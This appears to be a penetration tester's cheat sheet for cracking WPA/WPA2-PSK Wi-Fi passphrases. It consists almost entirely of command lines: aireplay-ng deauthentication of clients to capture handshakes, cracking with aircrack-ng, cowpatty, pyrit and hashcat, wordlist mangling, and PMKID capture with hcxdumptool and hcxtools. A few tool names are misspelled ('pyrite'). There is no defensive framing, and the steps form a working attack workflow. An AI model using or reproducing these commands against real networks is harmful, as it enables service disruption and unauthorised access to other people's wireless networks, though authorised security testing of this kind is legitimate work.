WPA/WPA2

WPA/WPA2 PSK

Deauthenticate a supplicant
aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

1.Deauthenticate with the broadcast address can be very efficient and convenient
2.Airodump should say “WPA Handshake”

Crack

aircrack

aircrack-ng -w <dico> <cap.pcap>

Rainbow tables - cowpatty

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrite batch
pyrite -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace

GPU - hashcat

https://hashcat.net/cap2hccapx/
hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt

Enhanced wordlist

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt lower_dico.txt > ll_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt upper_dico.txt > lu_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt lower_dico.txt > ul_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort | uniq > enhanced_custom.txt
cat enhanced_custom.txt | hashcat -r </usr/share/hashcat/rules/best64.rule> --stdout | sort | uniq > <custom_dico_best64.txt> 

PMKID

It only works on AP that supports roaming.

Installation
apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt
Attack
1.Traffic capture

Opportunistic attack without mac filtering

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSID

Copy one or more BSSID in a file with all chars in uppercase and without any separator (remove all “:”).
Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3
2.PCAP to hashes
hcxpcaptool -z <out.hashes> <pmkid.pcap>
3.Crack

Solution 1
WPA-PMKID-PBKDF2 (16800)

Solution 2

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

WPA-PMKID-PBKDF2 (2500)